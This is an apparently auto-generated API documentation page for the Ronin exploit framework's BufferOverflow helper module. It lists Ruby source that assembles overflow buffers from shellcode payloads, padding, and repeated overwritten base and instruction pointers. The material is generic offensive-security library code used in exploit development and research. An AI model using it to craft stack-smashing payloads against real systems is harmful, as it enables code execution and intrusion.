Module: Ronin::Exploits::Helpers::BufferOverflow

Defined in:
lib/ronin/exploits/helpers/buffer_overflow.rb

Overview

Adds methods to exploits for building buffers used in buffer overflows.

Target Parameters

The buffer overflow helper uses the following target parameters:

  • ip (required) - The Instruction Pointer (IP) to overwrite on the stack.
  • bp - The Base Pointer (BP) to overwrite on the stack.
  • buffer_length - The length of the buffer to overflow.
  • stack_frame_repeat - The number of times to repeat the overwritten stack frame.

Payloads

Uses the Payloads::Shellcode payload by default.

Instance Attribute Summary collapse

Class Method Summary collapse

Instance Method Summary collapse

Instance Attribute Details

#bufferObject

The buffer to use for the buffer overflow.


50
51
52
# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 50

def buffer
  @buffer
end

Class Method Details

.extended(obj) ⇒ Object


52
53
54
55
56
57
# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 52

def self.extended(obj)
  obj.instance_eval do
    helper :binary
    helper :padding
  end
end

Instance Method Details

#build_bufferString (protected)

Builds the buffer with the current target and payload to be used in the buffer overflow exploit.

Returns:

  • (String)

    The built buffer.

Raises:

  • (PayloadSize)

    The encoded payload is too large to fit within the targeted buffer length.


104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 104

def build_buffer
  test_target!

  buffer = ''

  if target[:buffer_length]
    if raw_payload.length > target[:buffer_length]
      raise(PayloadSize,"the specified payload is too large for the target's buffer length")
    end

    buffer << pad(target[:buffer_length] - raw_payload.length)
  else
    buffer << raw_payload
  end

  ip_packed = pack(target.ip)

  stack_frame_repeat = (target[:stack_frame_repeat] || 1)

  if target[:bp]
    buffer << ((pack(target[:bp]) + ip_packed) * stack_frame_repeat)
  else
    buffer << ((ip_packed * 2) * stack_frame_repeat)
  end

  return buffer
end

#payload_classClass

Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.

Returns:

Since:

  • 0.3.0


68
69
70
# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 68

def payload_class
  Payloads::Shellcode
end

#test_target!true

Tests the selected target has the ip target parameter.

Returns:

  • (true)

    The target is valid.

Raises:

Since:

  • 1.0.0


83
84
85
86
87
88
89
# File 'lib/ronin/exploits/helpers/buffer_overflow.rb', line 83

def test_target!
  super

  unless target.param?(:ip)
    raise(TargetDataMissing,"no such target param 'ip'")
  end
end